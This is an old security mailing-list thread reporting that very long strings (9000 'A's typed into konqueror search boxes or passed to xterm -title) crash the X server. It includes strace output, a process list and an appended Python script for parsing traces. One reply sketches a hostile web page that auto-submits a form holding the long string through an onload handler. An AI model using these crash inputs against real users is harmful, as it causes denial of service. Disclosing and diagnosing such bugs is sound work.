Re: Crashing X

From: KF (dotslash@snosoft.com)
Date: 01/01/04


Date: Thu, 31 Dec 1903 19:18:23 -0459
From: KF <dotslash@snosoft.com>
To: John Scimone <jscimone@cc.gatech.edu>

I reported a similar issue several months ago... I was seeing X crash
via xterm -title `perl -e 'print "A" x 9000'`
and also with html web pages with long title tags... Here's some strace
snippets. I am on a ppc linux box Mandrake 8.0

root 1927 1389 3 12:17 ? 00:00:03 /etc/X11/X -deferglyphs 16 -auth

[root@ibook root]# strace -o Xdebug.txt -ivfp 1715
1715 [0fea59dc] writev(11,
[{"\26\0)T\0@\2(\0@\2(\0\0\0\0\0\0\0\0\0\205\0\26\0\0\0\f"..., 224},
{"\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0"..., 6000}], 2)
= 6224
1715 [0fe987d8] read(11,
"8\17\0\5\0@\1\222\0\10\0\10\0\0\177\377\0\0\0\0008@\0\4"..., 6624) = 6624
1715 [0fe9e980] brk(0x10617000) = 0x10617000
1715 [0fe987d8] read(11,
"\0A\0A\0A\0A\0A\0A\0A\0A\0A\0A\0A\0A\0A\0A\0A\0A"..., 9988) = 9988
1715 [1031f26c] --- SIGSEGV (Segmentation fault) ---

1715 [0fe091b0] rt_sigaction(SIGSEGV, {SIG_IGN}, {0x1003d664, [SEGV],
SA_RESTART}, 8) = 0
1715 [0fea577c] ipc_subcall(0, 0, 0, 0x30848000) = 0
1715 [0fe987e8] write(2, "\nFatal server error:\n", 21) = 21

This was a bit earlier on in the strace
1715 [0fe987d8] read(11,
"\24\0\0\6\2\0\0\16\0\0\0017\0\0\1\'\0\0\0\0\0\0\10\0", 6624) = 24
1715 [0fea59dc] writev(11, [{"\1\10)\26\0\0\10\0\0\0\1\'\0\0\3(\0\0
\0\0\0\0\0\177\377"..., 32}, {"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"...,
8192}], 2) = 8224
1715 [0fe987d8] read(11,
"\24\0\0\6\2\0\0\16\0\0\1;\0\0\0\4\0\0\0\0\0\0\10\0", 6624) = 24

And before that
1715 [0fe987d8] read(11,
"\24\0\0\6\2\0\0\16\0\0\0\'\0\0\0\37\0\0\0\0\0\0 \0", 6624) = 24
1715 [0fea59dc] writev(11,
[{"\1\10)\v\0\0\10\312\0\0\0\37\0\0\0\0\0\0#(\0\0\0\0\177"..., 32},
{"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"..., 9000}], 2) = 9032
1715 [0fea59dc] --- SIGALRM (Alarm clock) ---

and before that
1715 [0fe987d8] read(11,
"\24\0\0\6\2\0\0\16\0\0\0017\0\0\1\'\0\0\0\0\0\0\10\0", 6624) = 24
1715 [0fea59dc] writev(11, [{"\1\10)\6\0\0\10\0\0\0\1\'\0\0\3(\0\0
\0\0\0\0\0\177\377"..., 32}, {"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"...,
8192}], 2) = 8224

Then this is me running xterm in the VERY beginning.
1715 [0fe987d8] read(16,
"\24\0\0\6\2\0\0\16\0\0\0\"\0\0\0\37\0\0\0\0\0\0\'\20", 4096) = 24
1715 [0fea59dc] writev(16,
[{"\1\10\20\315\0\0\10\316\0\0\0\37\0\0\0\0\0\0#6\0\0\0\0"..., 32},
{"xterm\0-title\0AAAAAAAAAAAAAAAAAAA"..., 9014}, {"\0\0", 2}], 3) = 9048
BBBBBB

these are the X processes running
root 1389 1 0 12:13 ? 00:00:00 kdm
root 1927 1389 1 12:17 ? 00:00:08 /etc/X11/X -deferglyphs 16 -auth
/var/lib/kdm/authfiles/A:0-KE8CBg
root 1928 1389 0 12:17 ? 00:00:00 -:0
root 1945 1928 0 12:17 ? 00:00:00 /bin/sh /usr/bin/startkde
root 2027 1 0 12:17 ? 00:00:00 kdeinit: dcopserver --nosid
root 2030 1 0 12:17 ? 00:00:00 kdeinit: klauncher
root 2032 1 0 12:17 ? 00:00:00 kdeinit: kded
root 2038 1 0 12:17 ? 00:00:00 kdeinit: kxmlrpcd
root 2041 1 0 12:17 ? 00:00:00 /usr/bin/artsd -F 5 -S 4096 -b 8 -s 1 -m
artsmessage -l 3 -f
root 2046 1 0 12:18 ? 00:00:00 kdeinit: Running...
root 2056 1 0 12:18 ? 00:00:00 knotify
root 2057 1945 0 12:18 ? 00:00:00 ksmserver --restore
root 2058 2046 0 12:18 ? 00:00:00 kdeinit: kwin
root 2060 1 0 12:18 ? 00:00:01 kdeinit: kdesktop
root 2062 1 0 12:18 ? 00:00:01 kdeinit: kicker
root 2066 1 0 12:18 ? 00:00:00 kdeinit: klipper -icon klipper -miniicon
klipper
root 2069 1 0 12:18 ? 00:00:00 kdeinit: khotkeys
root 2070 1 0 12:18 ? 00:00:00 kdeinit: kwrited
root 2071 2046 1 12:18 ? 00:00:04 kdeinit: konsole -icon konsole.png
-miniicon konsole.png
root 2072 1 0 12:18 ? 00:00:00 alarmd
root 2073 2070 0 12:18 pts/0 00:00:00 /bin/cat

-KF

John Scimone wrote:

> If this is true couldn't a malicious website simply set the initial value of
> the form then use javascript to submit it upon loading the page causing the
> clients X to crash?
>
> ie.
>
> <input type="text" value="(9000 A's)">
>
> and have a body onload=document.forms[0].submit()?
>
> John Scimone
> CS Major @ Ga Tech
>
>
> On Friday 07 December 2001 04:26 pm, you wrote:
>
>> I have discovered a little bug in K Desktop 2.1.2 that crashes your X
>> Server.
>>
>> By using the konqueror web browser and inputting around 9000+ A's (or
>> whatever) into a search box (for instance www.yahoo.com's web search box) -
>> this will crash your X environment.
>>
>> I have successfully done it using 9000 A's on one search box (crashing X
>> instantly), then I used 90'000 and it also worked - but without immediate
>> effect (took a few seconds).
>>
>> It also sometimes seems to work by just pasting 900000 A's into a search
>> box and before it even displays the A's X crashes. (note: If you want it
>> to display the A's before X crashes paste 9000, then as soon as you click
>> to start the search - it's bye bye X).
>>
>> Sorry but I can only test it on KDE 2.1.2, because I have no other systems
>> available right now.
>>
>> By the way:
>>
>> [smackenz@mainframe smackenz]$ uname -a
>> Linux mainframe 2.4.2-2 #1 Sun Apr 8 20:41:30 EDT 2001 i686 unknown
>> (Redhat 7.1)
>> (KDE 2.1.2)
>> (this works in Gnome and KDE using the konqueror web browser)
>>
>> To test simply use a shell and type:
>>
>> perl -e 'print "A" x 9000'
>>
>> Then copy these, and paste them into a search form.
>>
>> Also I tried this in netscape and it didn't work so it suggests it's a
>> konqueror error somewhere or other.
>>
>> Cheers
>>
>> Scott Mackenzie
>
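
A triage helper for traces like the one KF posted, added here as an example and not part of the original thread: it re-joins the strace records the mail client hard-wrapped, then lists the read/write calls seen before the fatal signal together with the instruction pointer that strace -i printed for it. The function names are hypothetical; the sample records are copied from the post with the string bodies shortened.

```python
import re

# Records copied from the strace excerpt in the post (string bodies shortened).
SAMPLE = r'''
1715 [0fea59dc] writev(11,
[{"\26\0)T\0@\2("..., 224},
{"\0\0\0\0\0\0\0\0"..., 6000}], 2)
= 6224
1715 [0fe987d8] read(11,
"8\17\0\5\0@\1\222"..., 6624) = 6624
1715 [0fe9e980] brk(0x10617000) = 0x10617000
1715 [0fe987d8] read(11,
"\0A\0A\0A\0A\0A\0A"..., 9988) = 9988
1715 [1031f26c] --- SIGSEGV (Segmentation fault) ---
1715 [0fe091b0] rt_sigaction(SIGSEGV, {SIG_IGN}, {0x1003d664, [SEGV],
SA_RESTART}, 8) = 0
'''

RECORD_START = re.compile(r'^\d+ \[[0-9a-f]+\] ')
# pid, instruction pointer, syscall name, first argument (fd), return value
CALL = re.compile(r'^(\d+) \[([0-9a-f]+)\] (\w+)\((\d+),.* = (-?\d+)')
SIGNAL = re.compile(r'^(\d+) \[([0-9a-f]+)\] --- (SIG\w+)')
IO_CALLS = {'read', 'readv', 'write', 'writev'}

def join_wrapped(text):
    """Re-join strace records that were hard-wrapped by the mail client."""
    records = []
    for line in filter(None, map(str.strip, text.splitlines())):
        if RECORD_START.match(line) or not records:
            records.append(line)      # a new "PID [ip] ..." record
        else:
            records[-1] += ' ' + line  # continuation of the previous record
    return records

def io_before_signal(text, signal='SIGSEGV'):
    """Return the signal's pid and IP plus every I/O call (name, fd, bytes) before it."""
    io = []
    for rec in join_wrapped(text):
        sig = SIGNAL.match(rec)
        if sig and sig.group(3) == signal:
            return {'pid': int(sig.group(1)), 'ip': sig.group(2), 'io': io}
        call = CALL.match(rec)
        if call and call.group(3) in IO_CALLS:
            io.append((call.group(3), int(call.group(4)), int(call.group(5))))
    return None  # the trace does not contain the signal

if __name__ == '__main__':
    hit = io_before_signal(SAMPLE)
    print('fault at ip', hit['ip'], 'after', hit['io'][-1])
```
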


